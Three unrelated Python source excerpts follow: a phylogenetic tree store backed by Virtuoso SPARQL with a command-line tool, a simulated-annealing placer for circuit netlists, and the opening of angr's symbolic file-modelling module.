if banned_word in x.lower():
raise Exception("Can't use the word %s in a filter." % banned_word)
return x
def get_connection(self):
if not self._connection:
self._connection =pyodbc.connect('DSN=%s;UID=%s;PWD=%s' %
(self.dsn, self.user, self.password),
autocommit=True)
return self._connection
def close(self):
if self._connection:
self._connection.close()
self._connection = None
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
connection = property(get_connection)
def get_cursor(self, need_new=False):
connection = self.connection
if need_new: return connection.cursor()
if not self._cursor: self._cursor = connection.cursor()
return self._cursor
def add_trees(self, tree_file, format, tree_uri=None, rooted=False,
taxonomy=None, tax_root=None):
'''Convert trees residing in a text file into RDF, and add them to the
underlying RDF store with a context node for retrieval.
Example:
>>> treestore.add_trees('test.newick', 'newick', 'http://www.example.org/test/')
'''
if tree_uri is None: tree_uri = os.path.basename(tree_file)
else: tree_uri = self.uri_from_id(tree_uri)
hash = sha.sha()
hash.update(str(time.time()))
tempfile_name = '%s.cdao' % hash.hexdigest()
if taxonomy:
# label higher-order taxa before adding
phylogeny = bp.read(tree_file, format)
if isinstance(taxonomy, basestring):
taxonomy = self.get_trees(self.uri_from_id(taxonomy))[0]
phylolabel.label_tree(phylogeny, taxonomy, tax_root=tax_root)
with open(os.path.join(self.load_dir, tempfile_name), 'w') as output_file:
bp._io.write([phylogeny], output_file, 'cdao')
else:
if format == 'cdao':
# if it's already in CDAO format, just copy it
f1, f2 = tree_file, os.path.join(self.load_dir, tempfile_name)
if not os.path.abspath(f1) == os.path.abspath(f2):
shutil.copy(f1, f2)
else:
# otherwise, convert to CDAO
bp.convert(tree_file, format, os.path.join(self.load_dir, tempfile_name), 'cdao',
tree_uri=tree_uri, rooted=rooted)
# run the bulk loader to load the CDAO tree into Virtuoso
cursor = self.get_cursor()
update_stmt = 'sparql load <file://%s> into %s' % (
os.path.abspath(os.path.join(self.load_dir, tempfile_name)), rdflib.URIRef(tree_uri).n3())
load_stmt = "ld_dir ('%s', '%s', '%s')" % (
os.path.abspath(self.load_dir), tempfile_name, tree_uri)
print load_stmt
cursor.execute(load_stmt)
update_stmt = "rdf_loader_run()"
print update_stmt
cursor.execute(update_stmt)
# the next treestore add may not work if you don't explicitly delete
# the bulk load list from the Virtuoso db after it's done
cursor.execute('DELETE FROM DB.DBA.load_list')
os.remove(os.path.join(self.load_dir, tempfile_name))
def get_trees(self, tree_uri):
'''Retrieve trees that were previously added to the underlying RDF
store. Returns a generator of Biopython trees.
Example:
>>> trees = treestore.get_trees('http://www.example.org/test/')
>>> trees.next()
Tree(weight=1.0, rooted=False)
'''
tree_uri = self.uri_from_id(tree_uri)
return [self.subtree(None, tree_uri)]
def serialize_trees(self, tree_uri='', format='newick', trees=None, handle=None):
'''Retrieve trees serialized to any format supported by Biopython.
Current options include 'newick', 'nexus', 'phyloxml', 'nexml', and 'cdao'
Example:
>>> treestore.serialize_trees('http://www.example.org/test/')
'''
if handle: s = handle
else: s = StringIO()
if tree_uri: tree_uri = self.uri_from_id(tree_uri)
if trees is None:
trees = [(x for x in self.get_trees(tree_uri)).next()]
if not trees:
raise Exception('Tree to be serialized not found.')
if format == 'cdao':
bp.write(trees, s, format, tree_uri=tree_uri)
elif format == 'ascii':
bp._utils.draw_ascii((i for i in trees).next(), file=s)
else:
bp.write(trees, s, format)
if handle: return
return s.getvalue()
def remove_trees(self, tree_uri):
'''Remove trees from treestore. Be careful with this; it really just
removes a named graph, so if Virtuoso contains named graphs other than
trees, those can be deleted too.
Example:
>>> treestore.remove_trees('http://www.example.org/test/')
'''
tree_uri = self.uri_from_id(tree_uri)
cursor = self.get_cursor()
cursor.execute('sparql clear graph %s' % rdflib.URIRef(tree_uri).n3())
def list_trees(self, **kwargs):
'''List all trees in the treestore.'''
return self.list_trees_containing_taxa(**kwargs)
def list_trees_containing_taxa(self, contains=[], show_counts=False, taxonomy=None, filter=None):
'''List all trees that contain the specified taxa.'''
filter = self.validate_filter(filter)
taxa_list = ', '.join([rdflib.Literal(contain).n3() for contain in contains])
# TODO: if filter: sanitize filter
query = '''
SELECT DISTINCT ?graph (count(DISTINCT ?label) as ?matches)
WHERE {
{
GRAPH ?graph {
?tree obo:CDAO_0000148 [] .
'''
if contains:
query += '{ ?match rdfs:label ?label . FILTER (?label in (%s)) }' % taxa_list
if filter:
query += filter
query += '''
}
}
'''
# optional synonym matching
if taxonomy and contains:
taxonomy = self.uri_from_id(taxonomy)
query += '''
UNION {
GRAPH ?graph {
?tree obo:CDAO_0000148 [] .
?t obo:CDAO_0000187 [ rdfs:label ?synonym ] . %s
}
GRAPH %s {
?x obo:CDAO_0000187 [ ?l1 ?synonym ; ?l2 ?label ]
FILTER (?label in (%s) &&
?l1 in (rdfs:label, skos:altLabel) &&
?l2 in (rdfs:label, skos:altLabel))
}
}''' % (filter if filter else '', rdflib.URIRef(taxonomy).n3(), taxa_list)
# end of query
query += '''
}
GROUP BY ?graph
ORDER BY DESC(?matches) CONTAINS(STR(?graph), "_taxonomy") ?graph
'''
query = self.build_query(query)
cursor = self.get_cursor()
if self.verbose: print query
cursor.execute(query)
for result in cursor:
if show_counts: yield (result[0], result[1])
else: yield (result[0])
def get_names(self, tree_uri=None, format=None):
if tree_uri: tree_uri = self.uri_from_id(tree_uri)
query = '''sparql
PREFIX obo: <http://purl.obolibrary.org/obo/>
PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
SELECT DISTINCT ?uri, ?label
WHERE {
GRAPH %s {
[] obo:CDAO_0000148 [] .
?uri rdfs:label ?label .
}
}
ORDER BY ?label
''' % ((rdflib.URIRef(tree_uri).n3()) if tree_uri else '?graph')
cursor = self.get_cursor()
if self.verbose: print query
cursor.execute(query)
results = cursor
if format == 'json':
metadata = {
"version":"",
"treestoreMetadata":{
"treestoreShortName":"rdf_treestore",
"treestoreLongName":"Phylotastic RDF Treestore",
"domain":"",
"urlPrefix":"",
}
}
json_dict = {'metadata': {}, 'externalSources': {},
'names': [{
'name': str(result[1]),
'treestoreId': str(result[0]),
'sourceIds': {},
}
for result in results
]
}
return repr(json_dict)
elif format == 'csv':
return ','.join(sorted(list(set([str(result[1]) for result in results]))))
else:
return [str(result[1]) for result in results]
def build_query(self, query):
return 'sparql\n' + '\n'.join(['PREFIX %s: <%s>' % x for x in self.prefixes]) + query
def get_tree_info(self, tree_uri=None):
if tree_uri: tree_uri = self.uri_from_id(tree_uri)
query = self.build_query('''
SELECT ?graph (count(?otu) as ?taxa) ?citation
WHERE {
GRAPH ?graph {
?tree obo:CDAO_0000148 [] .
?otu obo:CDAO_0000187 [] .
OPTIONAL { ?tree bibo:cites ?citation . }
}
%s
}
ORDER BY ?graph
''' % ('' if tree_uri is None else ('FILTER(?graph = %s)' % rdflib.URIRef(tree_uri).n3())))
cursor = self.get_cursor()
if self.verbose: print query
cursor.execute(query)
return [{k:v for k, v in zip(('tree', 'taxa', 'citation'), result) } for result in cursor]
def get_object_info(self, object):
query = '''sparql
SELECT ?v ?o
WHERE
{
?s ?v ?o .
FILTER (?s = %s)
}''' % rdflib.URIRef(object).n3()
cursor = self.get_cursor(True)
if self.verbose: print query
cursor.execute(query)
return cursor
def main():
import argparse
bp_formats = ' | '.join(bp._io.supported_formats)
input_formats = bp_formats
output_formats = '%s | ascii' % bp_formats
parser = argparse.ArgumentParser()
parser.add_argument('--version', action='version', version=__version__)
parser.add_argument('-v', '--verbose', action='store_true', help='write out SPARQL queries before executing')
parser.add_argument('-s', '--store', help='name of Redland store (default=virtuoso)')
parser.add_argument('-d', '--dsn', help='ODBC DSN (default=Virtuoso)')
parser.add_argument('-u', '--user', help='ODBC user (default=dba)')
parser.add_argument('-p', '--password', help='ODBC password (default=dba)')
subparsers = parser.add_subparsers(help='sub-command help', dest='command')
# treestore add: add trees to the database
add_parser = subparsers.add_parser('add', help='add trees to treestore')
add_parser.add_argument('file', help='tree file')
add_parser.add_argument('uri', help='tree uri (default=file name)', nargs='?', default=None)
add_parser.add_argument('-f', '--format', help='file format (%s)' % input_formats,
nargs='?', default='newick')
add_parser.add_argument('--rooted', help='this is a rooted tree', action='store_true')
add_parser.add_argument('--taxonomy', help="the URI of a taxonomy graph to label higher-order taxa",
nargs='?', default=None)
add_parser.add_argument('--tax-root', help="the name of the top-most taxonomic group in the tree, used to subset the taxonomy and avoid homonymy issues",
nargs='?', default=None)
# treestore get: download an entire tree
get_parser = subparsers.add_parser('get', help='retrieve trees from treestore')
get_parser.add_argument('uri', help='tree uri')
get_parser.add_argument('-f', '--format', help='serialization format (%s) (default=newick)' % output_formats,
nargs='?', default='newick')
# treestore rm: delete trees from the database
rm_parser = subparsers.add_parser('rm', help='remove trees from treestore')
rm_parser.add_argument('uri', help='tree uri')
# treestore ls: list trees
ls_parser = subparsers.add_parser('ls', help='list all trees in treestore')
ls_parser.add_argument('contains', help='comma-delimited list of desired taxa',
nargs='?', default='')
ls_parser.add_argument('--counts', help="display the number of matched taxa next to each tree URI",
action='store_true')
ls_parser.add_argument('-l', help="list one per line; don't try to pretty-print",
action='store_true')
ls_parser.add_argument('-f', help="show full URIs instead of just IDs",
action='store_true')
ls_parser.add_argument('--taxonomy', help="the URI of a taxonomy graph to enable synonymy lookup",
nargs='?', default=None)
ls_parser.add_argument('--filter', help="SPARQL graph pattern that returned trees must match",
nargs='?', default=None)
# treestore names: get list of taxa contained in a tree
names_parser = subparsers.add_parser('names',
help='return a comma-separated list of all taxa names')
names_parser.add_argument('uri', help='tree uri (default=all trees)',
nargs='?', default=None)
names_parser.add_argument('-f', '--format', help='file format (json, csv, xml) (default=csv)',
default='csv')
# treestore count: count the number of labeled nodes
count_parser = subparsers.add_parser('count',
help='returns the number of labeled nodes in a tree')
count_parser.add_argument('uri', help='tree uri (default=all trees)',
nargs='?', default=None)
# treestore query: create a subtree from a list of taxa
query_parser = subparsers.add_parser('query',
help='retrieve the best subtree containing a given set of taxa')
query_parser.add_argument('contains', help='comma-delimited list of desired taxa',
nargs='?')
query_parser.add_argument('uri', help='tree uri (default=select automatically)',
nargs='?', default=None)
query_parser.add_argument('-f', '--format', help='serialization format (%s) (default=newick)' % output_formats,
nargs='?', default='newick')
query_parser.add_argument('--complete', help="return complete subtree from MRCA; don't prune other taxa from the resulting tree",
action='store_true')
query_parser.add_argument('--taxonomy', help="the URI of a taxonomy graph to enable synonymy lookup",
nargs='?', default=None)
query_parser.add_argument('--filter', help="SPARQL graph pattern that returned trees must match",
nargs='?', default=None)
# treestore annotate: add metadata annotations to tree
ann_parser = subparsers.add_parser('annotate', help='annotate tree with triples from RDF file')
ann_parser.add_argument('uri', help='tree uri', default=None)
ann_parser.add_argument('--file', help='annotation file')
ann_parser.add_argument('--text', help='annotation, in turtle format', default=None)
ann_parser.add_argument('--doi', help='tree source DOI', default=None)
args = parser.parse_args()
if args.dsn: kwargs['dsn'] = args.dsn
if args.user: kwargs['user'] = args.user
if args.password: kwargs['password'] = args.password
elif not 'password' in kwargs: password = getpass()
kwargs['verbose'] = args.verbose
treestore = Treestore(**kwargs)
if args.command == 'add':
# parse a tree and add it to the treestore
treestore.add_trees(args.file, args.format, args.uri, rooted=args.rooted,
taxonomy=args.taxonomy, tax_root=args.tax_root)
elif args.command == 'get':
# get a tree, serialize in specified format, and output to stdout
treestore.serialize_trees(args.uri, args.format, handle=sys.stdout)
elif args.command == 'rm':
# remove a certain tree from the treestore
treestore.remove_trees(args.uri)
elif args.command == 'ls':
# list all trees in the treestore or trees containing a list of taxa
contains = args.contains
if contains:
contains = set([s.strip() for s in contains.split(',')])
trees = list(treestore.list_trees_containing_taxa(
contains=contains, taxonomy=args.taxonomy,
show_counts=args.counts, filter=args.filter))
if args.counts: trees = ['%s (%s)' % tree for tree in trees]
else: trees = [str(x) for x in trees]
else:
trees = list(treestore.list_trees(filter=args.filter))
if not trees: exit()
if not args.f:
trees = [treestore.id_from_uri(x) for x in trees]
if args.l:
print '\n'.join(trees)
else:
import lscolumns
lscolumns.printls(trees)
elif args.command == 'names':
print treestore.get_names(tree_uri=args.uri, format=args.format)
elif args.command == 'count':
print len([r for r in treestore.get_names(tree_uri=args.uri, format=None)])
elif args.command == 'query':
contains = set([s.strip() for s in args.contains.split(',')])
treestore.get_subtree(contains=contains, tree_uri=args.uri,
format=args.format,
prune=not args.complete,
taxonomy=treestore.uri_from_id(args.taxonomy) if args.taxonomy else None,
filter=args.filter,
handle=sys.stdout,
)
elif args.command == 'annotate':
treestore.annotate(args.uri, annotations=args.text, annotation_file=args.file, doi=args.doi)
if __name__ == '__main__':
main()
|
|
#Author: Jaspreet Jhoja
#contact:Jaspreetj@ece.ubc.ca
import random,copy, statistics, timeit, threading, math
from math import *
import numpy as np
import matplotlib.pyplot as plt
import plot as pt
import queue as Queue
print("SIMULATED ANNEALING BASED PLACER")
files = ['cm138a.txt', 'cm150a.txt', 'cm151a.txt', 'cm162a.txt', 'alu2.txt', 'C880.txt',
'e64.txt', 'apex1.txt', 'cps.txt', 'paira.txt', 'pairb.txt', 'apex4.txt']
for i in range(len(files)):
print('['+str(i)+']'+' - '+ files[i])
choice = input("choose files to run")
gui_choice = input("Do you want to see the progress in a GUI? y/n")
#if you want to use custom iterations and temperature, define here
user_iterations = 0
user_temp = 0
#want to run a mix of temperature handlers
hybrid = 0
#or choice in range(len(files)):
for i in range(1):
filename = files[int(choice)]
print(filename)
global nets, nodes, grid, netsn, nodesn, plot_x, plot_y
nets = [] #net details
nodes = {} #store all nodes in a dictionary
grid = [] #stores grid size
netsn = 0 #number of nets
nodesn = 0 #number of nodes
optimum = {}#optimum results
plot_x = []
plot_y = []
old_swap = [None, None]#previously swapped nodes
new_swap = [None, None] #currently proposed moves to swap
## Simulated Annealing variables
current_cost = 0 #initial or current cost
new_cost = 0 #new proposed cost
old_temp = 0 #previous temperature
current_temp = 0 #current or initial temperature
iterations = 0 #iterations
##################### NOTES ###################
#to get sinks for a node
#get nodedata by nodes[number][0]
#get sinks list by nodes[number][1]
#function to read file
def readfile(filename):
global grid, netsn, nodesn, nets, nodes
#split lines to read one by one
lines = open(filename).read().splitlines()
#extract grid
grid = [int(lines[0].split(' ')[-1]),int(lines[0].split(' ')[-2])]
nets = []
#iterate lines, extract number of nets and individual net nodes
for i in range(len(lines)):
if(i==0):
netsn = int(lines[i].split(' ')[-3]) #extract number of nets
nodesn = int(lines[i].split(' ')[0]) #extract number of nodes
#generate coordinates for nodes which we will use for cost eval
coordinates = []
for c in range(grid[0]):
for r in range(grid[1]):
coordinates.append([c,r*2])
#based on number of nodes, create dictionary keys
for each_node in range(grid[0]*grid[1]):
nodes[str(each_node)] = [coordinates[each_node],[]]
else:
#separate the net details and put them in a list
temp = list(filter(None,lines[i].split(' ')[1:]))
if(len(temp)>0):
nets.append(temp)
# associate nodes to their connections
source =temp[0]
sinks = temp[1:]
for each_sink in sinks:
nodes[source][1].append([each_sink])
# for nodes with no sinks, set none as their sinks so no arrow emerge from those nodes
for each_node in nodes:
sink_list = nodes[str(each_node)][1]
if(len(sink_list)==0):
nodes[str(each_node)][1].append(None)
#run the read function
readfile(filename)
# select two nodes which have not been repeated in the previous swap
def select_nodes(nodes_dict, previous_swaps):
new_lot = []
while True:
if(len(new_lot)==2):
#check if i am swapping two unoccupied slots
a = new_lot[0]
b = new_lot[1]
coor_a = nodes_dict[a][0][0]
coor_b = nodes_dict[b][0][0]
if(coor_a == None and coor_b == None):
print(new_lot)
new_lot = []
else:
return new_lot
new_node = random.choice([x for x in range(grid[0]*grid[1]) if x not in previous_swaps])
new_lot.append(str(new_node))
# accept moves
def make_swap(nodes_dict,swap):
a = swap[0]
b = swap[1]
coor_a = nodes_dict[a][0]
coor_b = nodes_dict[b][0]
nodes_dict[a][0] = coor_b
nodes_dict[b][0] = coor_a
return(nodes_dict)
#function to calculate cost
def calculate_cost(nodes_dict, nets):
cost = []
for each_net in nets:
net_x = []
net_y = []
dx = 0
dy = 0
for each_node in each_net:
data = nodes_dict[each_node][0]
net_x.append(data[0])
net_y.append(data[1])
#calculate half-perimeter
dx = abs(max(net_x) - min(net_x))
dy = abs(max(net_y) - min(net_y))
cost.append(dx+dy)
return(sum(cost))
#timer function
start_time = timeit.default_timer()
#setup SA
if(user_iterations == 0):
iterations = int(10*((nodesn)**(4/3)))
else:
iterations = user_iterations
initial_cost = calculate_cost(nodes, nets)
sigma = 0 #std dev of cost of accepted solutions
sigma_list = [] #list to store solutions
r_val = []
#set initial temperature
if(user_temp == 0):
for i in range(50):
sigma_node = copy.deepcopy(nodes)
sigma_swap = select_nodes(sigma_node, old_swap)
old_swap = sigma_swap
sigma_node = make_swap(sigma_node, sigma_swap)
temp_cost = calculate_cost(sigma_node, nets)
if(temp_cost<initial_cost):
sigma_list.append(temp_cost)
#calculate the standard deviation of accepted sigma values
sigma = statistics.stdev(sigma_list)
current_temp = 20*sigma
print(initial_cost, current_temp, iterations)
old_swap=[None, None]
#start with simulated annealing
#start plotting
if(gui_choice == "y"):
queue = Queue.Queue()
plot_thread = threading.Thread(target=pt.plotter, args=(queue, ))
plot_thread.start()
#check if cost is being repeated
isrepeating = 0
#record optimum node ever came across
optimum = nodes
while current_temp!=0:
sigma_list = []
for i in range(iterations):
current_cost = calculate_cost(nodes, nets)
#copy nodes data
temp_nodes = copy.deepcopy(nodes)
#get nodes to swap for temp_nodes
new_swap = select_nodes(temp_nodes, old_swap)
old_swap = new_swap
#modify node data
temp_nodes = make_swap(temp_nodes, new_swap)
#get cost for new swap
new_cost = calculate_cost(temp_nodes, nets)
dc = new_cost - current_cost
#if good
if(dc<0):
nodes = temp_nodes
sigma_list.append(new_cost)
#update best
#if bad
else:
r = random.random()
if(r< math.e**(-dc/current_temp)):
nodes = temp_nodes
sigma_list.append(new_cost)
if(calculate_cost(optimum,nets)<calculate_cost(nodes, nets)):
optimum = nodes
#current_temp = 0.98 *current_temp
#acceptance ratio of moves accepted to total tried
R_accept = len(sigma_list)/iterations
previous_temp = copy.deepcopy(current_temp)
if(0.96 < R_accept):
alpha = 0.5
elif(0.8 < R_accept and R_accept<=0.96):
alpha = 0.9
elif(0.05 < R_accept and R_accept<=0.8):
if(iterations==500):
alpha = 0.98
else:
alpha = 0.95
elif(R_accept<=0.05):
alpha = 0.8
r_val.append(alpha)
try:
if(hybrid == 1):
#check if temperature is stuck
if(isrepeating ==5):
current_temp = alpha*current_temp
isrepeating = 0
elif(isrepeating >=10):
current_temp = 0
else:
sigma = statistics.stdev(sigma_list)
current_temp = current_temp *math.e**(-0.7*(current_temp/sigma))
isrepeating = 0
else:
current_temp = alpha*current_temp
isrepeating = 0
except Exception as e:
None
#COMMENT THIS LINE IF DONT WANT ANY UPDATES
print(alpha,calculate_cost(nodes, nets), current_temp )
if(str(previous_temp)[:7] == str(current_temp)[:7]):
isrepeating = isrepeating + 1
#print(isrepeating)
if(current_temp<5e-6):
current_temp = 0
#add for plotting
if(gui_choice == "y"):
pt.update_data_sync(current_temp, calculate_cost(nodes, nets))
queue.put("GO")
# print(calculate_cost(nodes,nets), current_temp)
final_cost = calculate_cost(nodes, nets)
elapsed = timeit.default_timer() - start_time
print("time elapsed : ", elapsed)
print("final cost :", final_cost)
if(gui_choice == 'y'):
queue.put('BYE')
|
|
import claripy
import logging
import itertools
from .memory_object import SimMemoryObject
from ..state_plugins.plugin import SimStatePlugin
from ..state_plugins.sim_action_object import SimActionObject
from ..state_plugins.symbolic_memory import SimSymbolicMemory
from .. import sim_options
l = logging.getLogger(name=__name__)
file_counter = itertools.count()
dialogue_counter = itertools.count()
class Flags: # pylint: disable=W0232,
O_RDONLY = 0
O_WRONLY = 1
O_RDWR = 2
O_ACCMODE = 3 # bitmask for read/write mode
O_APPEND = 4096
O_ASYNC = 64
O_CLOEXEC = 512
# TODO mode for this flag
O_CREAT = 256
O_DIRECT = 262144
O_DIRECTORY = 2097152
O_EXCL = 2048
O_LARGEFILE = 1048576
O_NOATIME = 16777216
O_NOCTTY = 1024
O_NOFOLLOW = 4194304
O_NONBLOCK = 8192
O_NODELAY = 8192
O_SYNC = 67174400
O_TRUNC = 1024
def _deps_unpack(a):
if isinstance(a, SimActionObject):
return a.ast, a.reg_deps, a.tmp_deps
else:
return a, None, None
class SimFileBase(SimStatePlugin):
"""
SimFiles are the storage mechanisms used by SimFileDescriptors.
Different types of SimFiles can have drastically different interfaces, and as a result there's not much that can be
specified on this base class. All the read and write methods take a ``pos`` argument, which may have different
semantics per-class. ``0`` will always be a valid position to use, though, and the next position you should use
is part of the return tuple.
Some simfiles are "streams", meaning that the position that reads come from is determined not by the position you
pass in (it will in fact be ignored), but by an internal variable. This is stored as ``.pos`` if you care to read
it. Don't write to it. The same lack-of-semantics applies to this field as well.
:ivar name: The name of the file. Purely for cosmetic purposes
:ivar ident: The identifier of the file, typically autogenerated from the name and a nonce. Purely for cosmetic
purposes, but does appear in symbolic values autogenerated in the file.
:ivar seekable: Bool indicating whether seek operations on this file should succeed. If this is True, then ``pos``
must be a number of bytes from the start of the file.
:ivar writable: Bool indicating whether writing to this file is allowed.
:ivar pos: If the file is a stream, this will be the current position. Otherwise, None.
:ivar concrete: Whether or not this file contains mostly concrete data. Will be used by some SimProcedures to
choose how to handle variable-length operations like fgets.
"""
seekable = False
pos = None
def __init__(self, name, writable=True, ident=None, concrete=False, **kwargs):
self.name = name
self.ident = ident
self.writable = writable
self.concrete = concrete
if ident is None:
self.ident = self.make_ident(self.name)
if 'memory_id' in kwargs:
kwargs['memory_id'] = self.ident
super(SimFileBase, self).__init__(**kwargs)
@staticmethod
def make_ident(name):
if type(name) is str:
name = name.encode()
def generate():
consecutive_bad = 0
for ch in name:
if 0x20 <= ch <= 0x7e:
consecutive_bad = 0
yield chr(ch)
elif consecutive_bad < 3:
consecutive_bad += 1
yield '?'
nice_name = ''.join(generate())
return 'file_%d_%s' % (next(file_counter), nice_name)
def concretize(self, **kwargs):
"""
Return a concretization of the contents of the file. The type of the return value of this method will vary
depending on which kind of SimFile you're using.
"""
raise NotImplementedError
def read(self, pos, size, **kwargs):
"""
Read some data from the file.
:param pos: The offset in the file to read from.
:param size: The size to read. May be symbolic.
:return: A tuple of the data read (a bitvector of the length that is the maximum length of the read), the actual size of the read, and the new file position pointer.
"""
raise NotImplementedError
def write(self, pos, data, size=None, **kwargs):
"""
Write some data to the file.
:param pos: The offset in the file to write to. May be ignored if the file is a stream or device.
:param data: The data to write as a bitvector
:param size: The optional size of the data to write. If not provided will default to the length of the data.
Must be constrained to less than or equal to the size of the data.
:return: The new file position pointer.
"""
raise NotImplementedError
@property
def size(self):
"""
The number of data bytes stored by the file at present. May be a symbolic value.
"""
raise NotImplementedError
class SimFile(SimFileBase, SimSymbolicMemory):
"""
The normal SimFile is meant to model files on disk. It subclasses SimSymbolicMemory so loads and stores to/from
it are very simple.
:param name: The name of the file
:param content: Optional initial content for the file as a string or bitvector
:param size: Optional size of the file. If content is not specified, it defaults to zero
:param has_end: Whether the size boundary is treated as the end of the file or a frontier at which new content
will be generated. If unspecified, will pick its value based on options.FILES_HAVE_EOF. Another
caveat is that if the size is also unspecified this value will default to False.
:param seekable: Optional bool indicating whether seek operations on this file should succeed, default True.
:param writable: Whether writing to this file is allowed
:param concrete: Whether or not this file contains mostly concrete data. Will be used by some SimProcedures to
choose how to handle variable-length operations like fgets.
:ivar has_end: Whether this file has an EOF
"""
def __init__(self, name, content=None, size=None, has_end=None, seekable=True, writable=True, ident=None, concrete=None, **kwargs):
kwargs['memory_id'] = kwargs.get('memory_id', 'file')
super(SimFile, self).__init__(name, writable=writable, ident=ident, **kwargs)
self._size = size
self.has_end = has_end
self.seekable = seekable
# this is hacky because we need to work around not having a state yet
content = _deps_unpack(content)[0]
if type(content) is bytes:
if concrete is None: concrete = True
content = claripy.BVV(content)
elif type(content) is str:
if concrete is None: concrete = True
content = claripy.BVV(content.encode())
elif content is None:
pass
elif isinstance(content, claripy.Bits):
if concrete is None and not content.symbolic: concrete = True
pass
else:
raise TypeError("Can't handle SimFile content of type %s" % type(content))
if concrete is None:
concrete = False
self.concrete = concrete
if content is not None:
mo = SimMemoryObject(content, 0, length=len(content)//8)
self.mem.store_memory_object(mo)
if self._size is None:
self._size = len(content) // 8
else:
if self._size is None:
self._size = 0
if has_end is None:
self.has_end = False
@property
def category(self): # override trying to determine from self.id to allow arbitrary idents
return 'file'
def set_state(self, state):
super(SimFile, self).set_state(state)
if self.has_end is None:
self.has_end = sim_options.FILES_HAVE_EOF in state.options
if type(self._size) is int:
self._size = claripy.BVV(self._size, state.arch.bits)
elif len(self._size) != state.arch.bits:
raise TypeError("SimFile size must be a bitvector of size %d (arch.bits)" % state.arch.bits)
@property
def size(self):
return self._size
def concretize(self, **kwargs):
"""
Return a concretization of the contents of the file, as a flat bytestring.
"""
size = self.state.solver.min(self._size, **kwargs)
data = self.load(0, size)
kwargs['cast_to'] = kwargs.get('cast_to', bytes)
kwargs['extra_constraints'] = tuple(kwargs.get('extra_constraints', ())) + (self._size == size,)
return self.state.solver.eval(data, **kwargs)
def read(self, pos, size, **kwargs):
disable_actions = kwargs.pop('disable_actions', False)
inspect = kwargs.pop('inspect', True)
# Step 1: figure out a reasonable concrete size to use for the memory load
# since we don't want to concretize anything
if self.state.solver.symbolic(size):
try:
passed_max_size = self.state.solver.max(size, extra_constraints=(size < self.state.libc.max_packet_size,))
except SimSolverError:
passed_max_size = self.state.solver.min(size)
l.warning("Symbolic read size is too large for threshold - concretizing to min (%d)", passed_max_size)
self.state.solver.add(size == passed_max_size)
else:
passed_max_size = self.state.solver.eval(size)
if passed_max_size > 2**13:
l.warning("Program performing extremely large reads")
# Step 2.1: check for the possibility of EOFs
# If it's not possible to EOF (because there's no EOF), this is very simple!
if not self.has_end:
# bump the storage size as we read
self._size = self.state.solver.If(size + pos > self._size, size + pos, self._size)
return self.load(pos, passed_max_size, disable_actions=disable_actions, inspect=inspect), size, size + pos
# Step 2.2: check harder for the possibility of EOFs
# This is the size if we're reading to the end of the file
distance_to_eof = self._size - pos
distance_to_eof = self.state.solver.If(self.state.solver.SLE(distance_to_eof, 0), 0, distance_to_eof)
# try to frontload some constraint solving to see if it's impossible for this read to EOF
if self.state.solver.satisfiable(extra_constraints=(size > distance_to_eof,)):
# it's possible to EOF
# final size = min(passed_size, max(distance_to_eof, 0))
real_size = self.state.solver.If(size >= distance_to_eof, distance_to_eof, size)
return self.load(pos, passed_max_size, disable_actions=disable_actions, inspect=inspect), \
real_size, real_size + pos
else:
# it's not possible to EOF
# we don't need to constrain or min/max the output size because there are already constraints asserting
# that the total filesize is pretty big
# note: this assumes that constraints cannot be removed
return self.load(pos, passed_max_size, disable_actions=disable_actions, inspect=inspect), size, size + pos
def write(self, pos, data, size=None, events=True, **kwargs):
if events:
self.state.history.add_event('fs_write', filename=self.name, data=data, size=size, pos=pos)
data = _deps_unpack(data)[0]
if size is None:
size = len(data) // self.state.arch.byte_width if isinstance(data, claripy.Bits) else len(data)
# \(_^^)/
self.store(pos, data, size=size)
new_end = _deps_unpack(pos + size)[0] # decline to store SAO
self._size = self.state.solver.If(new_end > self._size, new_end, self._size)
return new_end
@SimStatePlugin.memo
def copy(self, _):
#l.debug("Copying %d bytes of memory with id %s." % (len(self.mem), self.id))
return type(self)(name=self.name, size=self._size, has_end=self.has_end, seekable=self.seekable, writable=self.writable, ident=self.ident, concrete=self.concrete,
mem=self.mem.branch(),
memory_id=self.id,
endness=self.endness,
abstract_backer=self._abstract_backer,
read_strategies=[ s.copy() for s in self.read_strategies ],
write_strategies=[ s.copy() for s in self.write_strategies ],
stack_region_map=self._stack_region_map,
generic_region_map=self._generic_region_map
)
def merge(self, others, merge_conditions, common_ancestor=None): # pylint: disable=unused-argument
if not all(type(o) is type(self) for o in others):
raise SimMergeError("Cannot merge files of disparate type")
if any(o.has_end != self.has_end for o in others):
raise SimMergeError("Cannot merge files where some have ends and some don't")
self._size = self.state.solver.ite_cases(zip(merge_conditions[1:], (o._size for o in others)), self._size)
return super(SimFile, self).merge(others, merge_conditions, common_ancestor=common_ancestor)
def widen(self, _):
raise SimMergeError("Widening the filesystem is unsupported")
class SimFileStream(SimFile):
"""
A specialized SimFile that uses a flat memory backing, but functions as a stream, tracking its position internally.
The pos argument to the read and write methods will be ignored, and will return None. Instead, there is an
attribute ``pos`` on the file itself, which will give you what you want.
:param name: The name of the file, for cosmetic purposes
:param pos: The initial position of the file, default zero
:param kwargs: Any other keyword arguments will go on to the SimFile constructor.
:ivar pos: The current position in the file.
"""
def __init__(self, name, content=None, pos=0, **kwargs):
super(SimFileStream, self).__init__(name, content=content, **kwargs)
self.pos = pos
def set_state(self, state):
super(SimFileStream, self).set_state(state)
if type(self.pos) is int:
self.pos = state.solver.BVV(self.pos, state.arch.bits)
elif len(self.pos) != state.arch.bits:
raise TypeError("SimFileStream position must be a bitvector of size %d (arch.bits)" % state.arch.bits)
def read(self, pos, size, **kwargs):
no_stream = kwargs.pop('no_stream', False)
if not no_stream:
pos = self.pos
data, size, pos = super(SimFileStream, self).read(pos, size, **kwargs)
if not no_stream:
self.pos = pos
return data, size, pos
def write(self, _, data, size=None, **kwargs):
self.pos = super(SimFileStream, self).write(self.pos, data, size, **kwargs)
return None
@SimStatePlugin.memo
def copy(self, memo):
c = super(SimFileStream, self).copy(memo)
c.pos = self.pos
return c
def merge(self, others, merge_conditions, common_ancestor=None): # pylint: disable=unused-argument
self.pos = self.state.solver.ite_cases(zip(merge_conditions[1:], [o.pos for o in others]), self.pos)
return super(SimFileStream, self).merge(others, merge_conditions, common_ancestor=common_ancestor)
class SimPackets(SimFileBase):
"""
The SimPackets is meant to model inputs whose content is delivered a series of asynchronous chunks. The data is
stored as a list of read or write results. For symbolic sizes, state.libc.max_packet_size will be respected. If
